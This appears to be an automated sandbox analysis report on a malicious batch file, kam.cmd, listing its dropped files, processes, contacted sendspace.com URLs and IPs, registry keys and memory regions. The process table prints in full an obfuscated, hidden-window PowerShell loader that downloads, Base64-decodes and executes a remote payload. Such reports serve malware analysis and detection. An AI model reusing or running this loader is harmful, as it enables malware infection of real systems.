Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
kam.cmd
|
ASCII text, with very long lines (6205), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tc2pmvdp.lku.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvi3zpu5.hum.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PSWVXT58HAM3K69OF0H1.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Tchick.Ite
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens
-lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function
Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti
Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe.
heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co
cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst
xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan
';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo
eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt
';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens
'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El
phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin
alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi
Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra
ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet
Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens
'.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO
TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren
($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M
rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e
');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerdNonbuFNedgjiBeskrlSvigeeSemif(
Ar,f$Sa.meOVejrtuHoejetUnchagA.lytnAd esaAti.gwPyr b,Inbr.$Sili.TNaphte Mdepowell,sJubiloParalf i htfSkudaeSe.esnP mpssValid)
mr,l ';$Teosoffens=$Bording[0];Billedhuggeren (Hystadens ' Jack$UltragImbo.lAggreoEnf.vb Fyrta ScanlDumpi:SlurbF,ydisoMud
ovgangle RbedoMedi l rgehaWi.letandenetrold= Helt(SemicTNonineS.afnsMirkstEurop-Pri,sPAgiosaKalort Triph.nsin Meiop$VelvaTTra,deSa.enoGrithsLate,ochuckf
HjemfProtoeLigkinFa.ersNedsn)Do,um ');while (!$Foveolate) {Billedhuggeren (Hystadens 'Bug e$ErkyngArbe.lForsooCholebStormaSwlealClo
h:Fj.nthPolsgu UnwisPistabBalbroKollin ,avld.nengr ankeeArbe tNonc =Fejls$Paus tGendirSinuauRustneM lli ') ;Billedhuggeren
$Jumped;Billedhuggeren (Hystadens 'PatenS HypotMarkea SporrB ggetP lse-Zit aSNoaltl ,ataeSpongeBenzipBundf Serri4Domme ');Billedhuggeren
(Hystadens 'Fremd$ D,sogEfterl OveroZest,bTressaChur,lOplad:,dervFUraadoAmak vSignaeUvennoFr,mslGenlyaPallatConteeh.spa= Cycl(I.rigTFiefdeHypoasRugkit
Over-InsecP PrelaData,tParchh Care Ginse$AdeesTMulseeShlepo NedssKnibtoVejr f GlotfKommae,ishtnCh essDrvpa)Grum ') ;Billedhuggeren
(Hystadens 'Ihrd $VrelsgL.quilForsvoSan tbUncreaTorywlSamvr: TurbHReaccjArcadr R,ine ,oelaOst.afMckenlNyv,reTalefdMilienartsfiSensinL.fayg
Ek,ps Im r=lngde$UnautgZaphrlScrapoBajonbCo,ciaIsognlHo,ot:UdsprFLaxnei.heels S,uakI dfre xumbr Popuigip.nmMembrian.grnForbei
MaarsUdbrdt AugueLft.brAmph iIndsteTrol rServenLyoneeVaretsExten+Terre+Firma%Hikha$DllesJMetriaHap ir subsnNon uoMeteo. S.utcFetico
Bothu AmalnComb,tD.ivb ') ;$Outgnaw=$Jarno[$Hjreaflednings];}$Sanitetsvsenernes=303750;$Rehaul=27249;Billedhuggeren (Hystadens
'Europ$DecimgForunlCellioP.ecob WitnaSrskalAlarm:TyverZOrkidaGa,kanInt gnIndtre RodfsTarmp Diegi=Klods ,remsGOmnumeBarost,ophu-UnsadCpaatroRansanAllo,tBasile
Bitrn FifotContu Brnde$ lkreT tandeOme eoprosisAutoboFavorf Polyfs,erteDe ronDermisBri a ');Billedhuggeren (Hystadens 'Ba
ca$DriftgPilkolLithooTaksebTilkeaGratil bu i:PelsePUdplarLi.jeo B,igfTestde ubansStngnsSoergi.ftero Disan Plade Lan,l Thor
Ascid=Tr kk Mecop[ ymfoS Chefy HooksSpandtFcpaue imebm.arto.H,dadC.iscooAp linSverivRuffle Sungr PraetEfter] Hebr:Disna:,ctinFConterConquo
S.bsm ExflB HalvaMe iosVallaebeh.n6 Yndi4Unv sSSucc.tP,eumrInteriPrearnEcphogZ,rib(Refec$.lshaZInviaaFras.n ForsnRosineSan,esQuadr)skram
');Billedhuggeren (Hystadens 'Mrk i$Meditg,kovdlTraveoSamarbSvagsaVe.galPr.pl:FodfoP hretuPrec sManu,s Ar.ylDej,geBilleyDompr
Teary=Tameh Defib[Tapr,S HoneyTi,ris ,ksktPari,e ,konmcr,me.BitteTHlereeSchelxU tratRinch.ravnsEFreshnIntercBa ndoHusvidNonreiPoikinSadhegAnili]F.der:Desua:CatadASmkl,SUdklaCGreb.IStvniIIvori.HundeGAkadeeCussetHjlp
SHy.tetSpermrArabeiModernM,xomgTre,s(Indek$Li sePPetitrdecreodrevefSvinee D,gosBuk,hszwzriiSuperoEmb,lnRidd e,prdelHovet)
Int, ');Billedhuggeren (Hystadens ' regn$prel g OrgilBeclooPageabDykkeaCal,alTrodd:Mi.roPCompuapens pDecadi Ma.grPraamaBuln
r ,inakKonsti,ilflvTermi6 P,er1Sover= bea.$PolygPFor,tuXenogs MiddsR.klalSolise Shony Dep . Pes sMorsiuUigenbRlin,sPensutShopbrFiskeiOrnitnrickagDem.r(Topog$Unde.S
ommaa.kistn .eski redjtManifeBrne,tPredis ra ivU skrsF lkeeFo,danAgrose.ntrerHebranGal eebackbs ,oci, ,aan$DukseR Op.yeF gbghU.artaSqu
ruStbnilco.ro) Loui ');Billedhuggeren $Papirarkiv61;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://fs12n5.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/ogm6qc
|
172.67.170.105
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://fs12n5.sendspaX
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://fs12n5.sendspace.com
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://fs12n5.sendspace.com/dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso
|
69.31.136.53
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/ogm6qcP
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
fs12n5.sendspace.com
|
69.31.136.53
|
||
|
www.sendspace.com
|
172.67.170.105
|
||
|
50.23.12.20.in-addr.arpa
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.67.170.105
|
www.sendspace.com
|
United States
|
||
|
69.31.136.53
|
fs12n5.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
289B4A73000
|
trusted library allocation
|
page read and write
|
|
|
|
167D6BAB000
|
heap
|
page read and write
|
||
|
289BCBB1000
|
heap
|
page read and write
|
||
|
289A2B1F000
|
heap
|
page read and write
|
||
|
D3AD57E000
|
stack
|
page read and write
|
||
|
289A67FA000
|
trusted library allocation
|
page read and write
|
||
|
289BCD10000
|
heap
|
page read and write
|
||
|
289A4565000
|
heap
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
|
D3AD07D000
|
stack
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
289BCDEC000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
289B4A10000
|
trusted library allocation
|
page read and write
|
||
|
289A62C2000
|
trusted library allocation
|
page read and write
|
||
|
289BCC03000
|
heap
|
page read and write
|
||
|
289A4EA5000
|
trusted library allocation
|
page read and write
|
||
|
D3AD379000
|
stack
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
289A2C00000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
D3AD1FF000
|
stack
|
page read and write
|
||
|
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
|
289A67FC000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
289A4E85000
|
trusted library allocation
|
page read and write
|
||
|
289BCC35000
|
heap
|
page read and write
|
||
|
289BCC31000
|
heap
|
page read and write
|
||
|
D3AD77B000
|
stack
|
page read and write
|
||
|
289A5127000
|
trusted library allocation
|
page read and write
|
||
|
167D6D90000
|
heap
|
page read and write
|
||
|
289A67A4000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
|
289A2AB8000
|
heap
|
page read and write
|
||
|
D3ACEFD000
|
stack
|
page read and write
|
||
|
D3AE14E000
|
stack
|
page read and write
|
||
|
289A43F0000
|
heap
|
page read and write
|
||
|
289A2AD7000
|
heap
|
page read and write
|
||
|
167D6D80000
|
heap
|
page read and write
|
||
|
D3ACFFE000
|
stack
|
page read and write
|
||
|
289A67BE000
|
trusted library allocation
|
page read and write
|
||
|
D3AD2FD000
|
stack
|
page read and write
|
||
|
289BCB5B000
|
heap
|
page read and write
|
||
|
289BCC00000
|
heap
|
page read and write
|
||
|
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
5156BFF000
|
stack
|
page read and write
|
||
|
289A67BB000
|
trusted library allocation
|
page read and write
|
||
|
289A6838000
|
trusted library allocation
|
page read and write
|
||
|
D3AD27E000
|
stack
|
page read and write
|
||
|
289A536C000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
D3AD5FF000
|
stack
|
page read and write
|
||
|
289BCBBE000
|
heap
|
page read and write
|
||
|
289BCA0D000
|
heap
|
page read and write
|
||
|
289A6A1B000
|
trusted library allocation
|
page read and write
|
||
|
D3AD478000
|
stack
|
page read and write
|
||
|
289A2A30000
|
heap
|
page read and write
|
||
|
7FF849190000
|
trusted library allocation
|
page read and write
|
||
|
289A694C000
|
trusted library allocation
|
page read and write
|
||
|
289A44F0000
|
heap
|
page read and write
|
||
|
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
289A6049000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
|
7DF49DFE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
289A67C6000
|
trusted library allocation
|
page read and write
|
||
|
289A4EBB000
|
trusted library allocation
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
289A2A3C000
|
heap
|
page read and write
|
||
|
167D6D85000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
289A684D000
|
trusted library allocation
|
page read and write
|
||
|
289A4490000
|
trusted library allocation
|
page read and write
|
||
|
289A67CE000
|
trusted library allocation
|
page read and write
|
||
|
167D6AF0000
|
heap
|
page read and write
|
||
|
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
289BD0E0000
|
heap
|
page read and write
|
||
|
D3ACE75000
|
stack
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
289A67A9000
|
trusted library allocation
|
page read and write
|
||
|
5156AFF000
|
unkown
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
289A49D7000
|
heap
|
page execute and read and write
|
||
|
289BCD96000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
|
289A2ADF000
|
heap
|
page read and write
|
||
|
167D6B10000
|
heap
|
page read and write
|
||
|
289A4EA7000
|
trusted library allocation
|
page read and write
|
||
|
289A2DD5000
|
heap
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
289BCDFA000
|
heap
|
page read and write
|
||
|
289A4E79000
|
trusted library allocation
|
page read and write
|
||
|
289B4A21000
|
trusted library allocation
|
page read and write
|
||
|
289A4E95000
|
trusted library allocation
|
page read and write
|
||
|
289BCBA6000
|
heap
|
page read and write
|
||
|
289A67CA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
289A4560000
|
heap
|
page read and write
|
||
|
289A4E3B000
|
trusted library allocation
|
page read and write
|
||
|
289A67E1000
|
trusted library allocation
|
page read and write
|
||
|
D3AD67F000
|
stack
|
page read and write
|
||
|
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
|
289A683C000
|
trusted library allocation
|
page read and write
|
||
|
289BCD34000
|
heap
|
page read and write
|
||
|
289A44C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
167D6BA0000
|
heap
|
page read and write
|
||
|
D3AE1CD000
|
stack
|
page read and write
|
||
|
289B4A01000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
D3AD4F9000
|
stack
|
page read and write
|
||
|
289A49F9000
|
heap
|
page read and write
|
||
|
289A2AF7000
|
heap
|
page read and write
|
||
|
D3AD0FE000
|
stack
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
289A44D0000
|
heap
|
page readonly
|
||
|
289A4A8E000
|
trusted library allocation
|
page read and write
|
||
|
289A48B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
167D6D84000
|
heap
|
page read and write
|
||
|
D3AD6FE000
|
stack
|
page read and write
|
||
|
289A4E82000
|
trusted library allocation
|
page read and write
|
||
|
289BCB53000
|
heap
|
page read and write
|
||
|
289A4E8D000
|
trusted library allocation
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
289A4A01000
|
trusted library allocation
|
page read and write
|
||
|
289A2A10000
|
heap
|
page read and write
|
||
|
289A48E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
289A4C2D000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
167D6A10000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
289A44E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
289BCDB9000
|
heap
|
page read and write
|
||
|
D3ACBDF000
|
stack
|
page read and write
|
||
|
289A2DD0000
|
heap
|
page read and write
|
||
|
289A4EF8000
|
trusted library allocation
|
page read and write
|
||
|
289A5DDC000
|
trusted library allocation
|
page read and write
|
||
|
289BCC10000
|
heap
|
page read and write
|
||
|
289A68CA000
|
trusted library allocation
|
page read and write
|
||
|
289B4CFC000
|
trusted library allocation
|
page read and write
|
||
|
289BCB6C000
|
heap
|
page read and write
|
||
|
289BCF10000
|
heap
|
page execute and read and write
|
||
|
D3AD17B000
|
stack
|
page read and write
|
||
|
289A4550000
|
heap
|
page execute and read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
289A49D0000
|
heap
|
page execute and read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
51567CD000
|
stack
|
page read and write
|
||
|
D3ACF7E000
|
stack
|
page read and write
|
||
|
289A2B25000
|
heap
|
page read and write
|
||
|
D3AD3F7000
|
stack
|
page read and write
|
||
|
289A4E91000
|
trusted library allocation
|
page read and write
|
||
|
289A4EFC000
|
trusted library allocation
|
page read and write
|
||
|
289A53DC000
|
trusted library allocation
|
page read and write
|
||
|
289B4CEE000
|
trusted library allocation
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
289A49F0000
|
heap
|
page read and write
|
||
|
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
|
289BCB10000
|
heap
|
page read and write
|
||
|
289A2A00000
|
heap
|
page read and write
|
There are 163 hidden memdumps, click here to show them.